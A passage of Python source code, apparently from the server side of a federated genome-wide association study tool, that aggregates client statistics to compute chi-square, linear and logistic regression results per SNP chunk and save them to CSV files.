beta_values = dict() # beta values shared with clients
for snp_index in self.considered_in_process_snp_indices:
# 2 for snp and intercept columns
beta_values[snp_index] = np.array([0.0 for _ in range(0, len(self.covariates) + 2)])
self.beta_values[snp_index] = beta_values[snp_index]
self.log_likelihood_values[snp_index] = None
# share initial beta values (excluding ignored SNPs) for which gradient, Hessian, and log likelihood
# should be computed in clients
self.global_parameters[SplinkGlobalParameter.BETA] = beta_values
self.global_parameters[SplinkGlobalParameter.CURRENT_BETA_ITERATION] = self.current_beta_iteration
# tell clients to go to beta-logistic step
self.set_step(SplinkProjectStep.BETA_LOGISTIC)
except Exception as minor_allele_exception:
logger.error(f'Project {self.project_id}: {minor_allele_exception}')
self.project_failed()
def contingency_table_step(self):
""" Compute global chi-square, odd ratio, and p-values using the aggregated contingency tables """
try:
contingency_tables = self.compute_aggregated_parameter(SplinkLocalParameter.CONTINGENCY_TABLE,
DataType.LIST_NUMPY_ARRAY_NON_NEGATIVE_INTEGER)
# convert global contingency table from list to dictionary
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices):
snp_counter += 1
self.contingency_tables[snp_index] = contingency_tables[snp_counter]
# compute the results (i.e. MAF, chi-square, odd-ratio, and p-values) for the chunk
self.compute_results_chi_square()
# add chromosome number, base pair distance, and p-value of the current chunk to results for all chunks
self.append_to_results_all_chunks()
# save the results using a separate process
save_process = multiprocessing.Process(target=self.save_results_chi_square)
save_process.daemon = True
save_process.start()
save_process.join()
save_process.terminate()
# empty the dictionaries to release the memory because they are not needed anymore
self.init_algorithm_attributes()
# if this is not the last chunk, set up the next chunk of SNPs
if not self.is_last_chunk():
self.setup_next_chunk()
else:
# if this is the last chunk, generate the manhattan plot first, and then, tell clients to download the results
self.manhattan_plot()
self.set_step(HyFedProjectStep.RESULT)
except Exception as contingency_table_exception:
logger.error(f'Project {self.project_id}: {contingency_table_exception}')
self.project_failed()
# ##### linear regression beta-step related functions
def beta_linear_step(self):
""" Compute linear regression global beta values using the aggregated XTX and XTY matrices for the chunk """
try:
# aggregate X'X matrices and X'Y vectors from the clients
xt_x_matrices = self.compute_aggregated_parameter(SplinkLocalParameter.XT_X_MATRIX,
DataType.LIST_NUMPY_ARRAY_FLOAT)
xt_y_vectors = self.compute_aggregated_parameter(SplinkLocalParameter.XT_Y_VECTOR,
DataType.LIST_NUMPY_ARRAY_FLOAT)
# convert lists to dictionaries
self.xt_x_matrices = dict()
self.xt_y_vectors = dict()
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices.copy()):
snp_counter += 1
self.xt_x_matrices[snp_index] = xt_x_matrices[snp_counter]
self.xt_y_vectors[snp_index] = xt_y_vectors[snp_counter]
# initialize beta values and xt_x_inverse_matrices as empty dictionaries
self.beta_values = dict()
self.xt_x_inverse_matrices = dict()
# queues
queue_beta = multiprocessing.Queue()
queue_xt_x_inverse = multiprocessing.Queue()
# threads to read from the queue
beta_read_thread = threading.Thread(target=self.read_queue_beta_linear, args=(queue_beta,))
beta_read_thread.daemon = True
beta_read_thread.start()
xt_x_inverse_read_thread = threading.Thread(target=self.read_queue_xt_x_inverse, args=(queue_xt_x_inverse,))
xt_x_inverse_read_thread.daemon = True
xt_x_inverse_read_thread.start()
# processes to compute the beta values and xt_x_inverse matrices for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices, sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_beta_linear_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk,
queue_beta, queue_xt_x_inverse,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read threads to be done
beta_read_thread.join()
xt_x_inverse_read_thread.join()
# close queues
queue_beta.close()
queue_xt_x_inverse.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# update considered index set
for snp_index in self.considered_snp_indices:
if self.beta_values[snp_index][0] == "NA":
self.considered_snp_indices.discard(snp_index)
self.std_error_values[snp_index] = self.beta_values[snp_index]
self.t_stat_values[snp_index] = self.beta_values[snp_index]
self.p_values[snp_index] = self.beta_values[snp_index]
continue
# only share beta values for considered SNPs with clients to compute sum square error values
beta_values = {snp_index: self.beta_values[snp_index] for snp_index in self.considered_snp_indices}
self.global_parameters[SplinkGlobalParameter.BETA] = beta_values
# tell clients to go to std-error step
self.set_step(SplinkProjectStep.STD_ERROR_LINEAR)
except Exception as beta_linear_exception:
logger.error(f'Project {self.project_id}: {beta_linear_exception}')
self.project_failed()
def calculate_beta_linear_sub_chunk(self, start_index, end_index, queue_beta, queue_xt_x_inverse):
""" Compute linear regression beta values for a sub-chunk """
beta_values = dict()
xt_x_inverse_matrices = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_beta.put(beta_values)
queue_xt_x_inverse.put(xt_x_inverse_matrices)
beta_values = dict()
xt_x_inverse_matrices = dict()
if np.linalg.det(self.xt_x_matrices[snp_index]) == 0:
self.beta_values[snp_index] = np.array(["NA" for _ in range(len(self.covariates) + 2)])
continue
xt_x_inverse_matrices[snp_index] = np.linalg.inv(self.xt_x_matrices[snp_index])
beta_values[snp_index] = np.dot(xt_x_inverse_matrices[snp_index], self.xt_y_vectors[snp_index]).flatten()
queue_beta.put(beta_values)
queue_xt_x_inverse.put(xt_x_inverse_matrices)
def read_queue_xt_x_inverse(self, queue_xt_x_inverse):
while len(self.xt_x_inverse_matrices) < len(self.considered_snp_indices):
xt_x_inverse = queue_xt_x_inverse.get()
self.xt_x_inverse_matrices.update(xt_x_inverse)
def read_queue_beta_linear(self, queue_beta_linear):
while len(self.beta_values) < len(self.considered_snp_indices):
betas = queue_beta_linear.get()
self.beta_values.update(betas)
# ##### linear regression std-error step related functions
def std_error_linear_step(self):
""" Compute linear regression standard error values using the aggregated SSE values """
try:
# aggregate SSE values from the clients
sse_values = self.compute_aggregated_parameter(SplinkLocalParameter.SSE, DataType.NUMPY_ARRAY_FLOAT)
# convert sse list to dictionary
self.sse_values = dict()
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices):
snp_counter += 1
self.sse_values[snp_index] = sse_values[snp_counter]
# initialize std_error_values as an empty dictionary
self.std_error_values = dict()
# queue
queue_std_error = multiprocessing.Queue()
# thread to read from the queue
std_error_read_thread = threading.Thread(target=self.read_queue_std_error, args=(queue_std_error,))
std_error_read_thread.daemon = True
std_error_read_thread.start()
# processes to compute the std error values for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices, sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_std_error_linear_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk, queue_std_error,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
std_error_read_thread.join()
# close queues
queue_std_error.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# compute results (i.e. t-stats and p-values) for the chunk
self.compute_results_regression()
# add chromosome number, base pair distance, and p-value of the current chunk to results for all chunks
self.append_to_results_all_chunks()
# save results
save_process = multiprocessing.Process(target=self.save_results_regression)
save_process.daemon = True
save_process.start()
save_process.join()
save_process.terminate()
# empty the dictionaries to release the memory because they are not needed anymore
self.init_algorithm_attributes()
# if this is not the last chunk, set up the next chunk of SNPs
if not self.is_last_chunk():
self.setup_next_chunk()
else:
# if this is the last chunk, generate the manhattan plot first, and then, tell clients to download the results
self.manhattan_plot()
self.set_step(HyFedProjectStep.RESULT)
except Exception as std_error_linear_exception:
logger.error(f'Project {self.project_id}: {std_error_linear_exception}')
self.project_failed()
def calculate_std_error_linear_sub_chunk(self, start_index, end_index, queue_std_error):
""" Compute linear regression std error values for a sub-chunk """
std_error_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_std_error.put(std_error_values)
std_error_values = dict()
sigma_squared = self.sse_values[snp_index] / (self.non_missing_sample_counts[snp_index] - len(self.covariates) - 2)
variance_values = (sigma_squared * self.xt_x_inverse_matrices[snp_index]).diagonal()
std_error_values[snp_index] = np.sqrt(variance_values)
queue_std_error.put(std_error_values)
# used in std-error step of linear/logistic regression
def read_queue_std_error(self, queue_std_error):
while len(self.std_error_values) < len(self.considered_snp_indices):
std_error = queue_std_error.get()
self.std_error_values.update(std_error)
# ##### logistic regression beta step related functions
def beta_logistic_step(self):
""" Compute logistic regression global beta values using the aggregated gradient and Hessian matrices for the chunk """
try:
# aggregate gradient, Hessian, and log likelihood values from the clients
gradient_vectors = self.compute_aggregated_parameter(SplinkLocalParameter.GRADIENT, DataType.LIST_NUMPY_ARRAY_FLOAT)
hessian_matrices = self.compute_aggregated_parameter( SplinkLocalParameter.HESSIAN, DataType.LIST_NUMPY_ARRAY_FLOAT)
log_likelihood_values = self.compute_aggregated_parameter(SplinkLocalParameter.LOG_LIKELIHOOD, DataType.NUMPY_ARRAY_FLOAT)
# convert lists to dictionaries
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.new_log_likelihood_values = dict()
snp_counter = -1
for snp_index in sorted(self.considered_in_process_snp_indices):
snp_counter += 1
self.gradient_vectors[snp_index] = gradient_vectors[snp_counter]
self.hessian_matrices[snp_index] = hessian_matrices[snp_counter]
self.new_log_likelihood_values[snp_index] = log_likelihood_values[snp_counter]
# initialize new beta values as an empty dictionary
self.new_beta_values = dict()
# queue
queue_beta_values = multiprocessing.Queue()
# thread to read from the queue
beta_value_read_thread = threading.Thread(target=self.read_queue_beta_logistic, args=(queue_beta_values,))
beta_value_read_thread.daemon = True
beta_value_read_thread.start()
# processes to compute the new beta values for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices, sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_beta_logistic_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk, queue_beta_values,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
beta_value_read_thread.join()
# close queues
queue_beta_values.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# update beta values
for snp_index in self.new_beta_values.keys():
self.beta_values[snp_index] = self.new_beta_values[snp_index]
# update considered index set
for snp_index in self.considered_in_process_snp_indices:
if self.beta_values[snp_index][0] == "NA":
self.considered_snp_indices.discard(snp_index)
self.std_error_values[snp_index] = self.beta_values[snp_index]
self.t_stat_values[snp_index] = self.beta_values[snp_index]
self.p_values[snp_index] = self.beta_values[snp_index]
continue
# check whether beta values for the SNP converged. If so, remove the SNP index from the in_process indices
for snp_index in self.considered_in_process_snp_indices:
old_log_likelihood = self.log_likelihood_values[snp_index]
new_log_likelihood = self.new_log_likelihood_values[snp_index]
if self.has_converged(old_log_likelihood, new_log_likelihood):
self.in_process_snp_indices.discard(snp_index)
# update log likelihood values
for snp_index in self.new_log_likelihood_values.keys():
self.log_likelihood_values[snp_index] = self.new_log_likelihood_values[snp_index]
# if there are still SNPs whose beta values not converged and max iterations not reached yet,
# share updated global beta values (excluding those ignored or converged) with the clients and stay in beta_logistic step
self.considered_in_process_snp_indices = self.considered_snp_indices.intersection(self.in_process_snp_indices)
if self.current_beta_iteration != self.max_iterations and len(self.considered_in_process_snp_indices) != 0:
self.current_beta_iteration += 1
beta_values = {snp_index: self.beta_values[snp_index] for snp_index in self.considered_in_process_snp_indices}
self.global_parameters[SplinkGlobalParameter.BETA] = beta_values
self.global_parameters[SplinkGlobalParameter.CURRENT_BETA_ITERATION] = self.current_beta_iteration
logger.debug(f'Project {self.project_id}: Beta iteration # {self.current_beta_iteration} done!')
# if beta max iterations reached or all beta values converged, share updated beta values (excluding ignored SNPs)
# with clients and go to the std_error_logistic step
else:
beta_values = {snp_index: self.beta_values[snp_index] for snp_index in self.considered_snp_indices}
self.global_parameters[SplinkGlobalParameter.BETA] = beta_values
self.set_step(SplinkProjectStep.STD_ERROR_LOGISTIC)
except Exception as beta_logistic_exception:
logger.error(f'Project {self.project_id}: {beta_logistic_exception}')
self.project_failed()
def calculate_beta_logistic_sub_chunk(self, start_index, end_index, queue_beta_values):
""" Compute logistic regression beta values for a sub-chunk """
new_beta_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_in_process_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_beta_values.put(new_beta_values)
new_beta_values = dict()
if np.linalg.det(self.hessian_matrices[snp_index]) == 0:
new_beta_values[snp_index] = np.array(["NA" for _ in range(len(self.covariates) + 2)])
continue
hessian_inverse_matrix = np.linalg.inv(self.hessian_matrices[snp_index])
beta_update_vector = np.dot(hessian_inverse_matrix, self.gradient_vectors[snp_index])
new_beta_vector = self.beta_values[snp_index].reshape(-1, 1) + beta_update_vector
new_beta_values[snp_index] = new_beta_vector.flatten()
queue_beta_values.put(new_beta_values)
def read_queue_beta_logistic(self, queue_beta_values):
while len(self.new_beta_values) < len(self.considered_in_process_snp_indices):
new_betas = queue_beta_values.get()
self.new_beta_values.update(new_betas)
# ##### logistic regression std-error step related functions
def std_error_logistic_step(self):
""" Compute logistic regression standard error values using the aggregated Hessian matrices for the chunk """
try:
# aggregate Hessian matrices from the clients
hessian_matrices = self.compute_aggregated_parameter(SplinkLocalParameter.HESSIAN, DataType.LIST_NUMPY_ARRAY_FLOAT)
# convert list to dictionary
self.hessian_matrices = dict()
snp_counter = -1
for snp_index in sorted(self.considered_snp_indices):
snp_counter += 1
self.hessian_matrices[snp_index] = hessian_matrices[snp_counter]
# initialize std_error_values as an empty dictionary
self.std_error_values = dict()
# queue
queue_std_error = multiprocessing.Queue()
# thread to read from the queue
std_error_read_thread = threading.Thread(target=self.read_queue_std_error, args=(queue_std_error,))
std_error_read_thread.daemon = True
std_error_read_thread.start()
# processes to compute the std error values for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices, sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_std_error_logistic_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk, queue_std_error,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
std_error_read_thread.join()
# close queues
queue_std_error.close()
# terminate the processes
for proc in process_list:
proc.terminate()
# update ignored index set
for snp_index in self.considered_snp_indices:
if self.std_error_values[snp_index][0] == "NA":
self.considered_snp_indices.discard(snp_index)
self.t_stat_values[snp_index] = self.std_error_values[snp_index]
self.p_values[snp_index] = self.std_error_values[snp_index]
continue
# compute the results (i.e. t-stats and p-values) for the chunk
self.compute_results_regression()
# add chromosome number, base pair distance, and p-value of the current chunk to results for all chunks
self.append_to_results_all_chunks()
# save results
save_process = multiprocessing.Process(target=self.save_results_regression)
save_process.daemon = True
save_process.start()
save_process.join()
save_process.terminate()
# empty the dictionaries to release the memory because they are not needed anymore
self.init_algorithm_attributes()
# if this is not the last chunk, set up the next chunk of SNPs
if not self.is_last_chunk():
self.setup_next_chunk()
else:
# if this is the last chunk, generate the manhattan plot first, and then, tell clients to download the results
self.manhattan_plot()
self.set_step(HyFedProjectStep.RESULT)
except Exception as std_error_logistic_exception:
logger.error(f'Project {self.project_id}: {std_error_logistic_exception}')
self.project_failed()
def calculate_std_error_logistic_sub_chunk(self, start_index, end_index, queue_std_error):
""" Compute logistic regression std error values for a sub-chunk """
std_error_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_std_error.put(std_error_values)
std_error_values = dict()
if np.linalg.det(self.hessian_matrices[snp_index]) == 0:
std_error_values[snp_index] = np.array(["NA" for _ in range(len(self.covariates) + 2)])
continue
std_error_values[snp_index] = np.sqrt(np.linalg.inv(self.hessian_matrices[snp_index]).diagonal())
queue_std_error.put(std_error_values)
# ############### functions related to all algorithms
def init_algorithm_attributes(self):
""" Set the chi-square or linear/logistic regression algorithm related dictionaries to empty """
self.non_missing_sample_counts = dict()
self.allele_counts = dict()
self.minor_allele_names = dict()
self.major_allele_names = dict()
self.minor_allele_counts = dict()
self.major_allele_counts = dict()
self.minor_allele_frequencies = dict()
self.major_allele_frequencies = dict()
self.contingency_tables = dict()
self.maf_case = dict()
self.maf_control = dict()
self.chi_square_values = dict()
self.odd_ratio_values = dict()
self.xt_x_matrices = dict()
self.xt_y_vectors = dict()
self.xt_x_inverse_matrices = dict()
self.sse_values = dict()
self.gradient_vectors = dict()
self.hessian_matrices = dict()
self.new_log_likelihood_values = dict()
self.new_beta_values = dict()
self.log_likelihood_values = dict()
self.beta_values = dict()
self.std_error_values = dict()
self.t_stat_values = dict()
self.p_values = dict()
def compute_p_values(self):
""" Compute p-values for a chunk with multi-processing """
try:
queue_p_values = multiprocessing.Queue()
# thread to read from the queue
p_value_read_thread = threading.Thread(target=self.read_queue_p_values, args=(queue_p_values,))
p_value_read_thread.daemon = True
p_value_read_thread.start()
# processes to compute the p-values for the sub-chunks
sub_chunk_start_indices, sub_chunk_end_indices = self.get_start_end_indices(cpu_cores=8)
process_list = list()
for start_index_sub_chunk, end_index_sub_chunk in zip(sub_chunk_start_indices,sub_chunk_end_indices):
process = multiprocessing.Process(target=self.calculate_p_values_sub_chunk,
args=(start_index_sub_chunk, end_index_sub_chunk, queue_p_values,))
process_list.append(process)
process.daemon = True
process.start()
# wait for read thread to be done
p_value_read_thread.join()
# close queues
queue_p_values.close()
# terminate the processes
for proc in process_list:
proc.terminate()
logger.info(f"Project {self.project_id}: p-value computation is done for chunk # {self.current_chunk}!")
except Exception as p_value_exception:
logger.error(f'Project {self.project_id}: {p_value_exception}')
self.project_failed()
def calculate_p_values_sub_chunk(self, start_index, end_index, queue_p_values):
""" Compute p-values for a sub-chunk """
p_values = dict()
for snp_index in np.arange(start_index, end_index):
if snp_index not in self.considered_snp_indices:
continue
# put results in the queue whenever computation is done for 1000 SNPs
if snp_index % 1001 == 1000:
queue_p_values.put(p_values)
p_values = dict()
if self.algorithm == SplinkAlgorithm.CHI_SQUARE:
p_values[snp_index] = 1 - stats.chi2.cdf(self.chi_square_values[snp_index], 1)
elif self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION:
degree_of_freedom = self.non_missing_sample_counts[snp_index] - len(self.covariates) - 2
p_values[snp_index] = 2 * (1 - stats.t.cdf(np.abs(self.t_stat_values[snp_index]), degree_of_freedom))
elif self.algorithm == SplinkAlgorithm.LOGISTIC_REGRESSION:
p_values[snp_index] = 1 - stats.chi2.cdf(np.square(np.array(self.t_stat_values[snp_index])), 1)
queue_p_values.put(p_values)
def read_queue_p_values(self, queue_p_values):
while len(self.p_values) < len(self.considered_snp_indices):
prob_values = queue_p_values.get()
self.p_values.update(prob_values)
# ##### Chi-square result computation/saving functions
def compute_maf(self):
""" Compute minor allele frequency of case/control for the chunk """
try:
for snp_index in self.considered_snp_indices:
minor_case = self.contingency_tables[snp_index][0]
major_case = self.contingency_tables[snp_index][1]
minor_control = self.contingency_tables[snp_index][2]
major_control = self.contingency_tables[snp_index][3]
self.maf_case[snp_index] = minor_case / (minor_case + major_case)
self.maf_control[snp_index] = minor_control / (minor_control + major_control)
logger.info(f'Project {self.project_id}: case/control minor allele frequency computation is done for chunk # {self.current_chunk}!')
except Exception as maf_exception:
logger.error(f'Project {self.project_id}: {maf_exception}')
self.project_failed()
def compute_chi_square_values(self):
""" Compute chi-square value for the chunk """
try:
for snp_index in self.considered_snp_indices:
# observed allele counts
observed_allele_counts = self.contingency_tables[snp_index]
# expected allele counts
expected_allele_counts = np.zeros(4)
case_count = self.contingency_tables[snp_index][0] + self.contingency_tables[snp_index][1]
control_count = self.contingency_tables[snp_index][2] + self.contingency_tables[snp_index][3]
minor_count = self.contingency_tables[snp_index][0] + self.contingency_tables[snp_index][2]
major_count = self.contingency_tables[snp_index][1] + self.contingency_tables[snp_index][3]
total_count = case_count + control_count
expected_allele_counts[0] = (case_count * minor_count) / total_count
expected_allele_counts[1] = (case_count * major_count) / total_count
expected_allele_counts[2] = (control_count * minor_count) / total_count
expected_allele_counts[3] = (control_count * major_count) / total_count
# compute chi-square value
chi_square = np.sum(np.square(observed_allele_counts - expected_allele_counts) / expected_allele_counts)
self.chi_square_values[snp_index] = chi_square
logger.info(f"Project {self.project_id}: chi-square computation is done for chunk # {self.current_chunk}!")
except Exception as chi_square_exception:
logger.error(f'Project {self.project_id}: {chi_square_exception}')
self.project_failed()
def compute_odd_ratio_values(self):
""" Compute odd ratio value for the chunk """
try:
for snp_index in self.considered_snp_indices:
minor_case = self.contingency_tables[snp_index][0]
major_case = self.contingency_tables[snp_index][1]
minor_control = self.contingency_tables[snp_index][2]
major_control = self.contingency_tables[snp_index][3]
if (major_case * minor_control) != 0:
self.odd_ratio_values[snp_index] = (minor_case * major_control) / (major_case * minor_control)
else:
self.odd_ratio_values[snp_index] = "NA"
logger.info(f"Project {self.project_id}: odd-ratio computation is done for chunk # {self.current_chunk}!")
except Exception as odd_ratio_exception:
logger.error(f'Project {self.project_id}: {odd_ratio_exception}')
self.project_failed()
def compute_results_chi_square(self):
""" Compute MAF for case/control, chi-square, odd-ratio, and p-values for chi-square algorithm """
try:
self.compute_maf()
self.compute_chi_square_values()
self.compute_odd_ratio_values()
self.compute_p_values()
except Exception as result_computation_error:
logger.error(f"Chi-square result computation error: {result_computation_error}")
self.project_failed()
def save_results_chi_square(self):
""" Save chi-square algorithm results for the chunk into the file """
try:
logger.info(f'Project {self.project_id}: Started saving results for chunk # {self.current_chunk}!')
# create result directory/file if they do not already exist
result_dir = self.create_result_dir()
result_file = open(f'{result_dir}/chi-square-result.csv', 'a')
# write the result file header in the first chunk
if self.current_chunk == 1:
result_file.write('CHR,SNP,BP,A1,F_A,F_U,A2,CHISQ,P,OR')
for snp_index in np.arange(self.chunk_start_index, self.chunk_end_index):
snp_id = self.snp_id_values[snp_index].decode('utf-8')
chromosome_number, snp_name, base_pair_distance = snp_id.split('\t')
minor_allele = self.minor_allele_names[snp_index]
major_allele = self.major_allele_names[snp_index]
maf_case = round_result(self.maf_case[snp_index])
maf_control = round_result(self.maf_control[snp_index])
chi_square = round_result(self.chi_square_values[snp_index])
p_value = round_result(self.p_values[snp_index])
odd_ratio = round_result(self.odd_ratio_values[snp_index])
csv_row = f'{chromosome_number},{snp_name},{base_pair_distance},{minor_allele},{maf_case},' \
f'{maf_control},{major_allele},{chi_square},{p_value},{odd_ratio}'
result_file.write("\n" + str(csv_row))
result_file.close()
logger.info(f'Project {self.project_id}: Saving results done for chunk # {self.current_chunk}!')
except Exception as save_exception:
logger.error(f'Project {self.project_id}: {save_exception}')
self.project_failed()
# ###### Linear/logistic regression result computation/saving functions
def compute_t_stat_values(self):
""" Compute T statistics for the chunk """
try:
for snp_index in self.considered_snp_indices:
self.t_stat_values[snp_index] = self.beta_values[snp_index] / self.std_error_values[snp_index]
logger.info(f'Project {self.project_id}: T statistics computation done for chunk # {self.current_chunk}!')
except Exception as t_stats_exception:
logger.error(f'Project {self.project_id}: {t_stats_exception}')
self.project_failed()
def compute_results_regression(self):
""" Compute t-stat and p-values for the linear/logistic regression algorithm """
try:
self.compute_t_stat_values()
self.compute_p_values()
except Exception as result_computation_error:
logger.error(f"Regression result computation error: {result_computation_error}")
self.project_failed()
def save_results_regression(self):
""" Save the linear/logistic regression results for the chunk into the file """
try:
# create result directory/file if they do not already exist
result_dir = self.create_result_dir()
if self.algorithm == SplinkAlgorithm.LINEAR_REGRESSION:
result_file = open(f'{result_dir}/linear-regression-result.csv', 'a')
else:
result_file = open(f'{result_dir}/logistic-regression-result.csv', 'a')
# write the result file header in the first chunk
if self.current_chunk == 1:
result_file.write('CHR,SNP,BP,A1,TEST,NMISS,BETA,STAT,P')
for snp_index in np.arange(self.chunk_start_index, self.chunk_end_index):
snp_id = self.snp_id_values[snp_index].decode('utf-8')
chromosome_number, snp_name, base_pair_distance = snp_id.split('\t')
beta_counter = 1
minor_allele = self.minor_allele_names[snp_index]
feature_name = 'ADD'
non_missing_samples = round_result(self.non_missing_sample_counts[snp_index])
beta_value = round_result(self.beta_values[snp_index][beta_counter])
t_stat_value = round_result(self.t_stat_values[snp_index][beta_counter])
p_value = round_result(self.p_values[snp_index][beta_counter])
csv_row = f'{chromosome_number},{snp_name},{base_pair_distance},' \
f'{minor_allele},{feature_name},{non_missing_samples},' \
f'{beta_value},{t_stat_value},{p_value}'
result_file.write("\n" + str(csv_row))
for covariate in self.covariates:
beta_counter += 1
beta_value = round_result(self.beta_values[snp_index][beta_counter])
t_stat_value = round_result(self.t_stat_values[snp_index][beta_counter])
p_value = round_result(self.p_values[snp_index][beta_counter])
csv_row = f'{chromosome_number},{snp_name},{base_pair_distance},' \
f'{minor_allele},{covariate},{non_missing_samples},' \
f'{beta_value},{t_stat_value},{p_value}'
result_file.write("\n" + str(csv_row))
result_file.close()
logger.info(f'Project {self.project_id}: Saving results done for chunk # {self.current_chunk}!')
except Exception as save_regression_results_exception:
logger.error(f'Project {self.project_id}: {save_regression_results_exception}')
self.project_failed()
# ############## Chunking functions
def init_chunks(self):
""" Set the total number of chunks and start/end indices of the chunks """
try:
self.total_chunks = int(np.ceil(len(self.snp_id_values) / self.chunk_size))
for split in np.array_split(np.arange(len(self.snp_id_values)), self.total_chunks):
self.start_indices_chunks.append(split[0])
self.end_indices_chunks.append(split[-1] + 1)
logger.debug(f'Project {self.project_id}: Initializing of chunks is done!')
except Exception as init_chunk_exp:
logger.error(f'Project {self.project_id}: {init_chunk_exp}')
self.project_failed()
def setup_next_chunk(self):
""" For the next chunk of SNPs:
set the start/end chunk index, increment chunk number,
set the chunk related global parameter values, and go to non-missing-count step
"""
try:
# set the chunk attribute values
self.chunk_start_index = self.start_indices_chunks[self.current_chunk]
self.chunk_end_index = self.end_indices_chunks[self.current_chunk]
self.current_chunk += 1
self.considered_snp_indices = set(np.arange(self.chunk_start_index, self.chunk_end_index)).copy()
self.in_process_snp_indices = set(
np.arange(self.chunk_start_index, self.chunk_end_index)).copy() # used in BETA step of logistic reg
self.current_beta_iteration = 1
# set the chunk global parameter values
self.global_parameters[SplinkGlobalParameter.CURRENT_CHUNK] = self.current_chunk
self.global_parameters[SplinkGlobalParameter.TOTAL_CHUNKS] = self.total_chunks
self.global_parameters[SplinkGlobalParameter.CHUNK_START_INDEX] = self.chunk_start_index
self.global_parameters[SplinkGlobalParameter.CHUNK_END_INDEX] = self.chunk_end_index
self.global_parameters[SplinkGlobalParameter.SNP_INDEX] = self.considered_snp_indices
# tell clients to compute statistics for the new chunk starting from the non-missing-count step
self.set_step(SplinkProjectStep.NON_MISSING_COUNT)
logger.debug(f'Project {self.project_id}: Chunk # {self.current_chunk} initialized!')
except Exception as next_chunk_exp:
logger.error(f'Project {self.project_id}: {next_chunk_exp}')
self.project_failed()
# ############## Helper functions
def is_last_chunk(self):
""" Check whether current chunk is the last one """
return self.current_chunk == self.total_chunks
def has_converged(self, old_log_likelihood, new_log_likelihood):
""" Determine whether beta values has converged based on the old and new values of log likelihood """
try:
if old_log_likelihood is None:
return False
delta_log_likelihood = np.abs(old_log_likelihood - new_log_likelihood)
if delta_log_likelihood > self.delta_log_likelihood_threshold:
return False
return True
except Exception as convergence_exception:
logger.error(f'Project {self.project_id}: {convergence_exception}')
self.project_failed()
def get_start_end_indices(self, cpu_cores):
""" Determine start/end indices for sub-chunks assigned to each process/core """
try:
chunk_size = self.chunk_end_index - self.chunk_start_index
# ensure each process/core will compute at least one SNP statistics
if chunk_size < cpu_cores:
cpu_cores = 1
sub_chunk_size = int(np.ceil(chunk_size / cpu_cores))
start_indices = np.arange(self.chunk_start_index, self.chunk_end_index, sub_chunk_size)
end_indices = start_indices + sub_chunk_size
end_indices[-1] = self.chunk_end_index
return start_indices, end_indices
except Exception as sub_chunk_exception:
logger.error(sub_chunk_exception)
self.project_failed()
return [], []
def append_to_results_all_chunks(self):
""" Add the chromosome numbers, base pair distances, and p-values of the current chunk to
the corresponding lists for all chunks """
for snp_index in np.arange(self.chunk_start_index, self.chunk_end_index):
snp_id = self.snp_id_values[snp_index].decode('utf-8')
chromosome_number, _ , base_pair_distance = snp_id.split('\t')
p_value = round_result(self.p_values[snp_index])
self.chromosome_number_all_chunks.append(chromosome_number)
self.base_pair_distance_all_chunks.append(base_pair_distance)
self.p_value_all_chunks.append(p_value)
logger.debug(f'Project {self.project_id}: Chunk # {self.current_chunk} CHR/BP/P added to results for all chunks!')
def manhattan_plot(self):
""" draw Manhattan plot for p-values after processing of all chunks finished """
try:
manhattan_dict = {'CHR': self.chromosome_number_all_chunks,
'BP': self.base_pair_distance_all_chunks,
'P': self.p_value_all_chunks}
manhattan_df = pd.DataFrame.from_dict(manhattan_dict)
manhattan_df.loc[manhattan_df.P == 0.0, 'P'] = np.finfo(float).eps
manhattan_df['P_LOG10'] = -np.log10(manhattan_df.P)
manhattan_df.CHR = manhattan_df.CHR.astype('category')
manhattan_df.CHR = manhattan_df.CHR.cat.set_categories(list(set(manhattan_df.CHR)), ordered=True)
manhattan_df = manhattan_df.sort_values(['CHR', 'BP'])
manhattan_df['ind'] = range(len(manhattan_df))
manhattan_df_grouped = manhattan_df.groupby('CHR')
fig = plt.figure(figsize=(24, 8), dpi=80)
ax = fig.add_subplot(111)
colors = ['blue', 'green', 'purple', 'brown']
x_labels = []
x_labels_pos = []
